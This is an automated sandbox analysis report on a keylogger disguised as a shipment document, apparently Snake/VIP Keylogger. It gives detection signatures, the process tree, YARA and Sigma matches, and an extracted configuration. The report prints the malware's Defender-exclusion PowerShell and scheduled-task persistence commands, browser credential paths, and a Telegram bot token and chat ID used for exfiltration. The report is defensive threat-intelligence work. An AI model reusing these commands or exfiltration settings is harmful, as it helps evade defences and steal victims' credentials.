Edit tour

Windows Analysis Report
MARCH SHIPMENT PLAN DOCS.exe

Overview

General Information

Sample name:	MARCH SHIPMENT PLAN DOCS.exe
Analysis ID:	1629837
MD5:	b294137f9559180e8dd17ecf2adb0310
SHA1:	98de846a4efbdef91f9bb9e5ab4a27bd6565c3fc
SHA256:	b679d845342b0551a231232c04eda781212b888bc3d1ce50a694e480861f81fb
Tags:	exeuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

MARCH SHIPMENT PLAN DOCS.exe (PID: 6276 cmdline: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe" MD5: B294137F9559180E8DD17ECF2ADB0310)

powershell.exe (PID: 7164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6760 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PKjWaa.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7476 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5428 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MARCH SHIPMENT PLAN DOCS.exe (PID: 7240 cmdline: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe" MD5: B294137F9559180E8DD17ECF2ADB0310)

MARCH SHIPMENT PLAN DOCS.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe" MD5: B294137F9559180E8DD17ECF2ADB0310)

PKjWaa.exe (PID: 7368 cmdline: C:\Users\user\AppData\Roaming\PKjWaa.exe MD5: B294137F9559180E8DD17ECF2ADB0310)

schtasks.exe (PID: 7896 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PKjWaa.exe (PID: 7948 cmdline: "C:\Users\user\AppData\Roaming\PKjWaa.exe" MD5: B294137F9559180E8DD17ECF2ADB0310)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat id": "6744331132"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat_id": "6744331132", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000014.00000002.3702397792.000000000043A000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000014.00000002.3702397792.000000000042A000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x60f5:$a1: get_encryptedPassword 0x641e:$a2: get_encryptedUsername 0x5f05:$a3: get_timePasswordChanged 0x600e:$a4: get_passwordField 0x610b:$a5: set_encryptedPassword 0x77bb:$a7: get_logins 0x771e:$a10: KeyLoggerEventArgs 0x7383:$a11: KeyLoggerEventArgsEventHandler
00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e8fd:$a1: get_encryptedPassword 0x2ec26:$a2: get_encryptedUsername 0x2e70d:$a3: get_timePasswordChanged 0x2e816:$a4: get_passwordField 0x2e913:$a5: set_encryptedPassword 0x2ffc3:$a7: get_logins 0x2ff26:$a10: KeyLoggerEventArgs 0x2fb8b:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2f075:$a1: get_encryptedPassword 0x2f39e:$a2: get_encryptedUsername 0x2ee85:$a3: get_timePasswordChanged 0x2ef8e:$a4: get_passwordField 0x2f08b:$a5: set_encryptedPassword 0x3073b:$a7: get_logins 0x3069e:$a10: KeyLoggerEventArgs 0x30303:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ee1d:$a1: get_encryptedPassword 0x72a3d:$a1: get_encryptedPassword 0x2f146:$a2: get_encryptedUsername 0x72d66:$a2: get_encryptedUsername 0x2ec2d:$a3: get_timePasswordChanged 0x7284d:$a3: get_timePasswordChanged 0x2ed36:$a4: get_passwordField 0x72956:$a4: get_passwordField 0x2ee33:$a5: set_encryptedPassword 0x72a53:$a5: set_encryptedPassword 0x304e3:$a7: get_logins 0x74103:$a7: get_logins 0x30446:$a10: KeyLoggerEventArgs 0x74066:$a10: KeyLoggerEventArgs 0x300ab:$a11: KeyLoggerEventArgsEventHandler 0x73ccb:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4c135:$a1: get_encryptedPassword 0x59088:$a1: get_encryptedPassword 0x4c454:$a2: get_encryptedUsername 0x593a7:$a2: get_encryptedUsername 0x4bf4f:$a3: get_timePasswordChanged 0x58ea2:$a3: get_timePasswordChanged 0x4c058:$a4: get_passwordField 0x58fab:$a4: get_passwordField 0x4c14b:$a5: set_encryptedPassword 0x5909e:$a5: set_encryptedPassword 0x4e62b:$a7: get_logins 0x5b57e:$a7: get_logins 0x4e58e:$a10: KeyLoggerEventArgs 0x5b4e1:$a10: KeyLoggerEventArgs 0x4e1f7:$a11: KeyLoggerEventArgsEventHandler 0x5b14a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 7256	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 7256	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 7256	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PKjWaa.exe PID: 7368	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PKjWaa.exe PID: 7368	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PKjWaa.exe PID: 7368	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: PKjWaa.exe PID: 7368	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PKjWaa.exe PID: 7368	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ff89:$a1: get_encryptedPassword 0x202a8:$a2: get_encryptedUsername 0x1fda3:$a3: get_timePasswordChanged 0x1feac:$a4: get_passwordField 0x1ff9f:$a5: set_encryptedPassword 0x2247f:$a7: get_logins 0x223e2:$a10: KeyLoggerEventArgs 0x2204b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: PKjWaa.exe PID: 7948	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PKjWaa.exe PID: 7948	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PKjWaa.exe PID: 7948	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x82969:$a1: get_encryptedPassword 0x82c88:$a2: get_encryptedUsername 0x82783:$a3: get_timePasswordChanged 0x8288c:$a4: get_passwordField 0x8297f:$a5: set_encryptedPassword 0x84e5f:$a7: get_logins 0x84dc2:$a10: KeyLoggerEventArgs 0x84a2b:$a11: KeyLoggerEventArgsEventHandler
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
20.2.PKjWaa.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.PKjWaa.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
20.2.PKjWaa.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e2f5:$a1: get_encryptedPassword 0x2e61e:$a2: get_encryptedUsername 0x2e105:$a3: get_timePasswordChanged 0x2e20e:$a4: get_passwordField 0x2e30b:$a5: set_encryptedPassword 0x2f9bb:$a7: get_logins 0x2f91e:$a10: KeyLoggerEventArgs 0x2f583:$a11: KeyLoggerEventArgsEventHandler
20.2.PKjWaa.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c0e5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b788:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b9e5:$a4: \Orbitum\User Data\Default\Login Data 0x3c3c4:$a5: \Kometa\User Data\Default\Login Data
20.2.PKjWaa.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef1b:$s1: UnHook 0x2ef22:$s2: SetHook 0x2ef2a:$s3: CallNextHook 0x2ef37:$s4: _hook
0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c4f5:$a1: get_encryptedPassword 0x2c81e:$a2: get_encryptedUsername 0x2c305:$a3: get_timePasswordChanged 0x2c40e:$a4: get_passwordField 0x2c50b:$a5: set_encryptedPassword 0x2dbbb:$a7: get_logins 0x2db1e:$a10: KeyLoggerEventArgs 0x2d783:$a11: KeyLoggerEventArgsEventHandler
0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a2e5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39988:$a3: \Google\Chrome\User Data\Default\Login Data 0x39be5:$a4: \Orbitum\User Data\Default\Login Data 0x3a5c4:$a5: \Kometa\User Data\Default\Login Data
0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d11b:$s1: UnHook 0x2d122:$s2: SetHook 0x2d12a:$s3: CallNextHook 0x2d137:$s4: _hook
0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e2f5:$a1: get_encryptedPassword 0x2e61e:$a2: get_encryptedUsername 0x2e105:$a3: get_timePasswordChanged 0x2e20e:$a4: get_passwordField 0x2e30b:$a5: set_encryptedPassword 0x2f9bb:$a7: get_logins 0x2f91e:$a10: KeyLoggerEventArgs 0x2f583:$a11: KeyLoggerEventArgsEventHandler
0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c0e5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b788:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b9e5:$a4: \Orbitum\User Data\Default\Login Data 0x3c3c4:$a5: \Kometa\User Data\Default\Login Data
0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef1b:$s1: UnHook 0x2ef22:$s2: SetHook 0x2ef2a:$s3: CallNextHook 0x2ef37:$s4: _hook
12.2.PKjWaa.exe.3e9b608.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.PKjWaa.exe.3e9b608.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.PKjWaa.exe.3e9b608.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.PKjWaa.exe.3e9b608.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.PKjWaa.exe.3e9b608.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.PKjWaa.exe.3e9b608.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.PKjWaa.exe.3e9b608.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e2f5:$a1: get_encryptedPassword 0x2e61e:$a2: get_encryptedUsername 0x2e105:$a3: get_timePasswordChanged 0x2e20e:$a4: get_passwordField 0x2e30b:$a5: set_encryptedPassword 0x2f9bb:$a7: get_logins 0x2f91e:$a10: KeyLoggerEventArgs 0x2f583:$a11: KeyLoggerEventArgsEventHandler
12.2.PKjWaa.exe.3e9b608.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c4f5:$a1: get_encryptedPassword 0x2c81e:$a2: get_encryptedUsername 0x2c305:$a3: get_timePasswordChanged 0x2c40e:$a4: get_passwordField 0x2c50b:$a5: set_encryptedPassword 0x2dbbb:$a7: get_logins 0x2db1e:$a10: KeyLoggerEventArgs 0x2d783:$a11: KeyLoggerEventArgsEventHandler
0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c4f5:$a1: get_encryptedPassword 0x2c81e:$a2: get_encryptedUsername 0x2c305:$a3: get_timePasswordChanged 0x2c40e:$a4: get_passwordField 0x2c50b:$a5: set_encryptedPassword 0x2dbbb:$a7: get_logins 0x2db1e:$a10: KeyLoggerEventArgs 0x2d783:$a11: KeyLoggerEventArgsEventHandler
12.2.PKjWaa.exe.3e9b608.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a2e5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39988:$a3: \Google\Chrome\User Data\Default\Login Data 0x39be5:$a4: \Orbitum\User Data\Default\Login Data 0x3a5c4:$a5: \Kometa\User Data\Default\Login Data
0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a2e5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39988:$a3: \Google\Chrome\User Data\Default\Login Data 0x39be5:$a4: \Orbitum\User Data\Default\Login Data 0x3a5c4:$a5: \Kometa\User Data\Default\Login Data
12.2.PKjWaa.exe.3e9b608.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c0e5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b788:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b9e5:$a4: \Orbitum\User Data\Default\Login Data 0x3c3c4:$a5: \Kometa\User Data\Default\Login Data
12.2.PKjWaa.exe.3e9b608.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d11b:$s1: UnHook 0x2d122:$s2: SetHook 0x2d12a:$s3: CallNextHook 0x2d137:$s4: _hook
0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d11b:$s1: UnHook 0x2d122:$s2: SetHook 0x2d12a:$s3: CallNextHook 0x2d137:$s4: _hook
12.2.PKjWaa.exe.3e9b608.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef1b:$s1: UnHook 0x2ef22:$s2: SetHook 0x2ef2a:$s3: CallNextHook 0x2ef37:$s4: _hook
0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e2f5:$a1: get_encryptedPassword 0x71f15:$a1: get_encryptedPassword 0x2e61e:$a2: get_encryptedUsername 0x7223e:$a2: get_encryptedUsername 0x2e105:$a3: get_timePasswordChanged 0x71d25:$a3: get_timePasswordChanged 0x2e20e:$a4: get_passwordField 0x71e2e:$a4: get_passwordField 0x2e30b:$a5: set_encryptedPassword 0x71f2b:$a5: set_encryptedPassword 0x2f9bb:$a7: get_logins 0x735db:$a7: get_logins 0x2f91e:$a10: KeyLoggerEventArgs 0x7353e:$a10: KeyLoggerEventArgs 0x2f583:$a11: KeyLoggerEventArgsEventHandler 0x731a3:$a11: KeyLoggerEventArgsEventHandler
0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c0e5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fd05:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b788:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f3a8:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b9e5:$a4: \Orbitum\User Data\Default\Login Data 0x7f605:$a4: \Orbitum\User Data\Default\Login Data 0x3c3c4:$a5: \Kometa\User Data\Default\Login Data 0x7ffe4:$a5: \Kometa\User Data\Default\Login Data
0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ef1b:$s1: UnHook 0x72b3b:$s1: UnHook 0x2ef22:$s2: SetHook 0x72b42:$s2: SetHook 0x2ef2a:$s3: CallNextHook 0x72b4a:$s3: CallNextHook 0x2ef37:$s4: _hook 0x72b57:$s4: _hook
Click to see the 36 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ParentImage: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe, ParentProcessId: 6276, ParentProcessName: MARCH SHIPMENT PLAN DOCS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe", ProcessId: 7164, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\PKjWaa.exe, ParentImage: C:\Users\user\AppData\Roaming\PKjWaa.exe, ParentProcessId: 7368, ParentProcessName: PKjWaa.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp", ProcessId: 7896, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

